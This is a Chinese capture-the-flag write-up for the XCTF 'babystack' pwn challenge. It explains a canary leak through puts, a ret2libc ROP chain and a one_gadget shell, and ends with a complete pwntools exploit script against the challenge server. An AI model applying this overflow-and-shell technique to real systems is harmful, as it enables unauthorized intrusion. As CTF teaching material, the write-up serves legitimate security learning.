2019.10.16 babystack 攻防世界

我们先检查一下程序的开了哪些保护机制。
2019.10.16 babystack 攻防世界
文章图片

2019.10.16 babystack 攻防世界
文章图片

2019.10.16 babystack 攻防世界
文章图片

v8就是那个标志canary,程序有个输出puts(),有read(),并且read()有一个非常明显的溢出(s的大小只有0x90,但是read读取了0x100大小的数据)
2019.10.16 babystack 攻防世界
文章图片

我们用one_gadget libc文件名来查找one_gadget。
①这道题主要是绕过canary,然后栈溢出getshell。
②经分析,read函数读入到s处,可以溢出。
③put函数输出s的内容,遇到’\x00’才停止,即使字符串中存在’\n’,也会继续输出,用来泄露canary的值。
④泄露出canary的值后,通过read函数溢出,泄露出read函数地址,得到libc基址。
⑤用onegadget直接找到execve的地址,再次溢出,跳转到此地址获得shell。
【2019.10.16 babystack 攻防世界】这里和平常有点不一样的就是我们需要退出(即 3)才能执行栈中的内容。
我们最后把exp:
#!/usr/bin/env python
from pwn import *
elf=ELF(’./babystack’)
libc=ELF(’./libc-2.23.so’)
p=remote(‘111.198.29.45’,52070)
prdi_addr=0x0400a93
main_addr=0x0400908
one_gadget_addr=0x45216
put_plt=elf.plt[‘puts’]
put_got=elf.got[‘puts’]
p.sendlineafter(’>> ‘,‘1’)
p.sendline(‘a’*0x88)
p.sendlineafter(’>> ‘,‘2’)
p.recvuntil(‘a’*0x88+’\n’)
canary=u64(p.recv(7).rjust(8,’\x00’))
print hex(canary)
p.sendlineafter(’>> ‘,‘1’)
payload=‘a’*0x88+p64(canary)+‘a’*8+p64(prdi_addr)+p64(put_got)+p64(put_plt)+p64(main_addr)
p.sendline(payload)
p.recv()
p.sendlineafter(’>> ‘,‘3’)
put_addr=u64(p.recv(8).ljust(8,’\x00’))
print hex(put_addr)
libc_base=put_addr-libc.symbols[‘puts’]
flag=libc_base+one_gadget_addr
p.sendlineafter(’>> ‘,‘1’)
payload1=‘a’*0x88+p64(canary)+‘a’*8+p64(flag)
p.sendline(payload1)
p.sendlineafter(’>> ',‘3’)
p.interactive()

    推荐阅读